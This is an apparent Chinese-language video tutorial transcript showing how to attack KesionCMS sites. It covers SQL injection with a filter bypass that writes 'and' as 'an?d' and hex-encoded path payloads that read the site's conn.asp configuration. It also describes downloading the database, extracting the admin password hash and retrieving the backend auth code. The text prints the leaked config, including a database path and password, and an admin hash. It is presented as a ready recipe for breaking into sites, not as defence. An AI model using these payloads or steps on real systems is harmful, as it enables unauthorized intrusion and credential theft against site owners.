动画介绍:正常显示...1=1正常返回.1=2就非法参数..典型的注入啊..不过这里要特别说明一下..着个and我们要改写成an?d这样才可以成功的绕过防注入....我们继续
一共是34个字段..如果返回的是模板不存在,请先绑定! 就证明可以....如果什么都没有的话就放弃把..换一个..接下来我们来暴库..在把第10个字段改成../conn.asp..直接这样改是不可以的...要把../conn.asp这几个字母转换成unicode才可以..我已经弄好了
../conn.asp= 0x2E002E002F0063006F006E006E002E00610073007000
成功了.我们来看下源马
st DataBaseType=0 ’系统数据库类型,"1"为MS SQL2000数据库,"0"为MS ACCESS 2000数据库
Const SysVer=1
Const MsxmlVersion=".3.0" ’系统采用XML版本设置
If DataBaseType=0 then
’如果是ACCESS数据库,请认真修改好下面的数据库的文件名
DBPath = "/KS_Data/KesionCMS4.mdb" ’ACCESS数据库的文件名,请使用相对于网站根目录的的绝对路径
SqlNowString = "Now()"
Else
’如果是SQL数据库,请认真修改好以下数据库选项
DataServer = "(local)" ’数据库服务器IP
DataUser = "sa" ’访问数据库用户名
DataBaseName = "kesioncms4" ’数据库名称
DataBasePsw = "989066" ’访问数据库密码
SqlNowString = "getdate()"
End if
很简单的就拿到了他数据库的路境/KS_Data/KesionCMS4.mdb..我们把他下载回来看下他的管理员帐号密码是多少...速度有点慢...下好了.我们来看下
帐号是admin密码是b7a57a12565a15d1==3948602
..我们去解下密码
...我们去登陆他的后台把....说明一下啊这里有个认证码...有的管理员会把他修改成其他的啊...不过我们还是一样可以把他暴出来
这段语句放在刚才我们暴库的第10的字段那里就可以了啊0x2E002E002F00610064006d0069006e002F006300然后查看源马就可以得到他的认证码...刚才那个是我之前弄的啊把他删了...然后我们就新建页面...
教程就这样了啊有什么不明白可以问我啊......有时间我会做kesion的上传漏洞还有跨目录浏览的教程. |
安全中国首页 > 动画中心 > 综合注入动画
